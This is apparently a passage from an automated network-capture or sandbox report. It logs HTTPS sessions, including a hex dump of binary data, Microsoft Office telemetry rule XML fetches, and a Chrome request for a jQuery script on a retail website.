                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 3f f8 9a f9 31 66 2d d2 b5 ac f5 27 da aa 57 24 77 34 a5 49 74 63 8d 56 df bc 8f a8 07 c4 2f 0f 9e 9a 86 40 f4 86 4f fe 26 a7 1e 36 d1 4b 60 5e e4 fb 44 e7 ff 00 65 af 9c 15 fc e5 46 f3 5a 35 04 36 d0 70 32 2b a6 d3 bc 4f 15 9c de 64 87 71 7e aa b8 c7 d6 b8 aa 73 c7 e0 d4 ed a6 a1 2f 8b 43 db 63 f1 76 93 34 81 12 e5 99 cf 45 10 c9 ff 00 c4 d3 e6 f1 46 9b 6f 8f 32 67 5c f4 cc 32 73 ff 00 8e d7 82 dc 78 aa 48 75 07 9e de 72 4e e2 46 7b 57 5d a5 f8 ea 4b bd 36 30 d2 07 74 e5 dd 80 27 71 ec 3f 0a c6 53 ab 05 76 8d 14 21 27 68 9e 92 3c 5d a5 16 0b f6 96 0c 7b 18 64 1f fb 2d 5e 87 54 b6 b8 5c c7 21 23 dd 18 7f 31 5e 55 ff 00 09 67 96 c1 80 52 dd 37 30 19 c5 69 27 8e 25 68 86 3c b5 e3 19 db 51 1c 43 fb 48 b9 50 fe 53 d1 fe d9 08 19 2f 81 ee 0d 54 7f 10 e9 f1 b1
                                                                                                                                                                                                            Data Ascii: ?1f-'W$w4ItcV/@O&6K`^DeFZ56p2+Odq~s/Ccv4EFo2g\2sxHurNF{W]K60t'q?Sv!'h<]{d-^T\!#1^UgR70i'%h<QCHPS/T
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: f3 c2 da 85 ac 22 13 11 73 26 e6 e4 82 0f 43 c5 5e 8f 4c 8e cd e3 30 c8 e8 37 02 ca 79 0c 71 fa 56 91 9c db d5 68 67 28 c5 2f 33 a4 fe d0 83 24 6f ff 00 c7 4f f8 51 59 54 57 49 9d 8d ea 28 a2 82 42 be 2d f8 c9 e3 99 bc 71 e3 6b d9 92 5d da 7d ab 1b 6b 44 07 e5 d8 a7 05 be ac 72 7e 98 1d ab eb bf 17 5e 3e 9b e1 3d 6a ee 26 db 24 16 53 4a ad e8 56 36 20 fe 95 f0 af f6 4b b0 f9 65 5c d6 f4 ad bb 30 ab 77 a2 2b ac a7 b9 a9 16 ec ad 29 d1 66 ef 22 d4 8b a3 7a c9 9a ea e6 47 37 23 05 d4 8a f7 a9 17 50 e7 ef 52 ae 8b 1f 77 34 d9 34 d8 93 a4 86 8e 64 1c 8c b5 0e a0 bc 64 d5 9f b6 c2 df c4 07 e3 59 5f 61 8d 7a 48 68 5b 78 d4 f0 f9 fa d2 d0 35 46 d2 de 26 46 d6 ce 3b ad 5d 86 ed 76 82 cd f8 56 14 4a 37 05 03 1e c0 54 fe 67 ef 02 74 ed 4a c8 d1 36 6c b5 d4 72 36 37
                                                                                                                                                                                                            Data Ascii: "s&C^L07yqVhg(/3$oOQYTWI(B-qk]}kDr~^>=j&$SJV6 Ke\0w+)f"zG7#PRw44ddY_azHh[x5F&F;]vVJ7TgtJ6lr67
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 05 91 10 e0 2f 99 83 8f c6 af 2b 36 d0 4a e0 e3 a6 7a 57 5c 36 39 e5 b8 ea 2a 1b 86 9b ca 3f 67 0a 65 ed e6 74 ac 69 6e b5 f0 38 b4 8c 77 f9 30 7f 0a a7 2e 51 25 73 79 51 63 5c 2a 85 1e c2 96 a8 e9 b7 97 37 11 e2 e6 d9 a1 7f ef 63 00 d5 dd d4 45 a6 b4 16 c2 d1 49 9a 33 54 00 ca 19 48 23 20 f5 06 92 38 d2 25 c2 28 41 fe cd 2e ea 5c d1 e6 01 45 14 50 01 45 14 50 01 45 14 50 01 47 bf 7a 28 a0 02 8a 28 a0 02 97 34 94 50 03 12 14 8d 99 95 15 59 8e 58 81 c9 a7 d1 9a 4d d4 00 b4 51 f8 d1 40 1b d4 51 45 04 18 3e 3d 05 bc 0b e2 20 06 49 d3 6e 46 07 fd 72 6a f8 de 3b 29 3f e7 93 7e 46 be ce f1 93 6d f0 86 b8 7d 2c 67 3f f9 0d ab e6 9b 1b c2 f8 52 03 0f a5 3e 67 15 74 8a 8c 14 dd 9b 38 f5 d3 d9 97 95 6f ca a5 5d 34 37 a8 af 50 b0 d1 e0 ba 64 25 23 e7 a8 c5 6d 37 c3
                                                                                                                                                                                                            Data Ascii: /+6JzW\69*?getin8w0.Q%syQc\*7cEI3TH# 8%(A.\EPEPEPGz((4PYXMQ@QE>= InFrj;)?~Fm},g?R>gt8o]47Pd%#m7
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 00 67 48 21 88 07 ff 00 59 ff 00 2c d9 88 55 1c f2 4f 4a fd 65 f3 bc d6 66 3d cd 76 60 e1 19 73 36 b4 fe ae 79 b8 fe 6a 73 8a be bf a7 43 35 3c 23 a4 2c 0f 09 b3 8d e3 73 93 b8 7f 2a cb be f8 5d e1 9b d9 0c 8d 65 e4 67 af 96 f8 5f ca ba 90 d4 1c 30 20 8c 83 d8 d7 a2 a9 c2 3f 0a b1 e5 73 c9 ee cf 3c 97 e0 a6 88 f2 e6 da f6 48 c6 79 8d 80 6f eb 52 c3 f0 66 c2 10 0a de 30 6e ff 00 27 1f ce bb af b3 c0 30 44 51 82 39 1f 2d 4a 5a 9f 2d fe 27 f8 b0 e6 b6 df 92 38 c8 7e 15 e9 f1 cc b2 1b 86 38 1f dd ef 5a 36 fe 07 82 dd 70 2e 9d b2 72 58 f0 7e 82 b8 9f da 1b e3 f5 87 c0 3f 0c 59 df 4d 67 fd a7 aa ea 32 bc 56 56 6c fb 13 08 01 79 5c f5 da b9 51 81 c9 24 0e 2a 8f c0 4f 8f 29 f1 3b c3 cd 3e ad 25 bd b5 f2 48 63 61 1f 19 6e a4 63 b2 e3 a1 e9 d4 67 8a e0 ab 57 0f 4e
                                                                                                                                                                                                            Data Ascii: gH!Y,UOJef=v`s6yjsC5<#,s*]eg_0 ?s<HyoRf0n'0DQ9-JZ-'8~8Z6p.rX~?YMg2VVly\Q$*O);>%HcancgWN
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: e1 ff 00 0a f8 5b c4 da ad f4 1a 4d c3 45 ad a5 8d e2 ff 00 62 dc ee c8 31 b2 0e 67 99 3f bd 9d 8b d3 0c dd 3e 1f f1 71 92 5b ad 8e d8 94 3b 23 ee ee 14 e1 4f fd f3 8a aa b3 2a dc 43 1a 80 b1 a1 da aa bc 01 d8 63 f3 ab 5e 2e 9b cc f1 15 cf 18 01 53 1d f9 2a 09 3f 9d 79 9a ca a7 3b dc fa 47 42 30 8c 69 47 63 1a 1b 57 3b 57 7a 28 ed f2 d7 55 a1 58 dc 2c e8 e6 f6 de 36 fb b1 c9 2a 30 03 fd 96 2b 93 b4 9c 76 e3 ad 72 e6 62 14 9c f4 e9 56 ec f5 26 db e4 0f 94 13 bb 76 7d b9 a2 a2 94 91 e8 61 9d 1a 72 b4 95 fe 6c fd 7d fd 89 fe 1e e9 5e 09 f8 43 36 a7 a5 eb 30 f8 81 fc 45 76 2e e5 bf 87 82 8a 88 02 5b 48 a1 99 55 e2 63 20 3b 78 6c 86 ef 5f 41 29 af cb 6f d8 17 e2 b5 ff 00 81 fe 33 69 da 07 da 9b fb 03 c4 b2 0b 1b cb 57 6f 93 cd 2a 7c 99 80 e8 1c 30 db 9e e1 88
                                                                                                                                                                                                            Data Ascii: [MEb1g?>q[;#O*Cc^.S*?y;GB0iGcW;Wz(UX,6*0+vrbV&v}arl}^C60Ev.[HUc ;xl_A)o3iWo*|0
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 6c e3 1b 25 76 63 79 7a bb 90 22 86 52 c7 81 f2 e4 d5 5d 49 75 8b 49 14 de 79 d1 e3 e5 1b fa 7d 2b ab fe dc d6 63 55 db 6d 3a 10 3f 78 c1 08 f3 3d 09 e3 8c 7b 56 75 dd e5 e5 f6 56 e6 de 49 b1 c1 57 8d 8f ff 00 aa b4 85 49 27 ac 51 12 82 6b 76 72 bb c3 48 0c 9b 48 f5 02 9e ac 8a 7e 42 0d 6d 9b 3b 5e 37 58 48 be bd 46 7f 4a 9f 6e 94 9c 2e 96 c7 d7 cc 95 89 fc 30 2b a1 e2 17 f2 bf c0 c5 51 7d ff 00 33 9e 69 24 6e 00 e2 93 74 9c 67 35 b9 24 7a 73 0c 0b 42 9f f6 d4 d4 96 c3 4b 8b fd 65 9b ca 7b 7e fc 8f e9 47 d6 34 f8 43 d8 eb b9 83 b9 f3 8c 1a 5d cf dc e2 ba 91 a8 5a 2a 85 8e c6 38 47 e0 c7 f3 35 22 de 5a 6c da 6d 23 93 dd d5 4f f4 ac be b1 2f e4 34 f6 2b f9 8e 50 37 bd 38 49 cf 5a e9 bc eb 2c e7 ec 63 ea 31 fe 15 24 73 59 46 a7 64 41 4b 75 c2 2e 69 7d 61 ff
                                                                                                                                                                                                            Data Ascii: l%vcyz"R]IuIy}+cUm:?x={VuVIWI'QkvrHH~Bm;^7XHFJn.0+Q}3i$ntg5$zsBKe{~G4C]Z*8G5"Zlm#O/4+P78IZ,c1$sYFdAKu.i}a
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 53 9e 43 64 74 ae 93 4f b3 9e 35 65 9c e1 08 c6 cc f5 a9 af 0c d0 ac 62 08 84 ab d0 86 1b 88 fc e8 f6 72 6b 99 b0 f6 8a f6 48 c6 b6 f1 43 c7 1e d9 21 13 38 e8 f9 c1 3f 5a b2 be 26 2c 06 6d 80 fa 36 6b 49 6c e0 91 77 4b 6f 11 72 3e 6f 94 56 3d d6 e8 59 91 2c 8f 96 09 01 8a 93 55 2f 69 04 b5 12 e4 93 d8 b6 9e 23 8d 9b 06 06 03 d7 70 a9 17 5f 87 6f fa a7 dd e9 91 8a c5 67 19 e6 dc c7 ea 70 6a 41 24 27 f8 71 ed 51 ed a7 dc bf 67 1e c6 a4 da d2 49 1b 2a c6 41 23 ab 1e 94 5a eb 11 ac 61 1a 36 ca 8e 58 11 cd 53 91 6c 7e ce a0 39 32 b7 3c 37 4a a5 26 d5 e1 7f 9d 0e ac 93 bd c1 42 2f 4b 1b bf db 96 fd 0a bf e1 8a 46 d7 ed a3 ea b2 7e 42 b9 d4 ff 00 81 1a 56 d3 ef 25 f9 96 d6 72 3b 7c b5 3f 58 a8 f6 1f b2 87 53 72 4d 6a c6 e5 76 ca 92 7d 31 4d 17 7a 53 63 fd 1f 3f
                                                                                                                                                                                                            Data Ascii: SCdtO5ebrkHC!8?Z&,m6kIlwKor>oV=Y,U/i#p_ogpjA$'qQgI*A#Za6XSl~92<7J&B/KF~BV%r;|?XSrMjv}1MzSc?
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 2f 6a 54 0c fe ee e4 ff 00 51 59 ba d4 23 bc e3 ff 00 81 c4 b5 77 b5 fe e6 7a 95 af 85 ac 2d 58 3c 8a 66 38 e5 64 20 8a 4b cd 0f 4f 8d 59 97 4f 66 18 cf ee 5c 83 ff 00 d6 af 36 4f 8a 7a 23 72 d2 ed 3d 3e 59 95 b9 ac cd 7f e3 c7 87 fc 23 62 9a 95 fd dc b0 d9 34 ab 0f 9d 6e af 39 46 73 84 dc 14 70 18 e1 41 3c 64 81 91 9a 16 2a 83 f7 54 a3 ff 00 81 45 94 a1 26 fa fd cc f4 8c 68 d1 b0 12 59 dc 21 f4 67 38 a8 2f 17 48 92 3f f4 78 6e 23 7c f5 dc 31 fa d7 1f a5 fc 6b d2 3c 45 0c be 4d e4 c6 28 65 6b 77 37 80 41 fb d5 c6 f8 c0 90 02 59 09 01 80 c8 19 1c f3 57 e4 f1 a6 9d 71 f2 c7 6d 18 95 54 b1 54 94 06 20 0e 4e de b8 fa 0a 3d a4 5e 9c cb ef 57 34 71 71 7e f2 7f 89 bd a6 db da ad f4 52 99 65 8c c7 fb c1 c0 3f 32 8c 8f d4 57 e0 de a9 78 75 3d 6b 50 b9 92 53 24 d7
                                                                                                                                                                                                            Data Ascii: /jTQY#wz-X<f8d KOYOf\6Oz#r=>Y#b4n9FspA<d*TE&hY!g8/H?xn#|1k<EM(ekw7AYWqmTT N=^W4qq~Re?2Wxu=kPS$


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            121192.168.2.45779713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:52 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                            x-ms-request-id: d55876ee-301e-0099-5603-2d6683000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052952Z-16547b76f7f9bs6dhC1DFWt3rg000000067g000000004gr9
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            122192.168.2.45779413.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:52 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 485
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                            x-ms-request-id: e9d45ae3-801e-0078-395c-2ebac6000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052952Z-17df447cdb5g2j9ghC1DFWev0800000002ag000000004721
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            123192.168.2.45779613.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:52 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 470
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                            x-ms-request-id: 4bc251d2-601e-00ab-3370-2e66f4000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052952Z-15869dbbcc6kg5mvhC1DFWgs2s0000000100000000004shs
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            124192.168.2.45779513.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:52 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 411
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                            x-ms-request-id: 1572e0e4-b01e-003e-1a0c-2d8e41000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052952Z-16547b76f7f7scqbhC1DFW0m5w000000064g000000001n66
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            125192.168.2.45779813.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:52 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 502
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                            x-ms-request-id: d30de13e-b01e-003e-435c-2e8e41000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052952Z-17df447cdb5tcj54hC1DFW3yew00000002dg00000000c0nd
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            126192.168.2.457801162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC605OUTGET /etc.clientlibs/clientlibs/granite/jquery/granite.lc-011c0fc0d0cf131bdff879743a353002-lc.min.js HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:53 GMT
                                                                                                                                                                                                            Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            cache-control: public, max-age=2592000, immutable
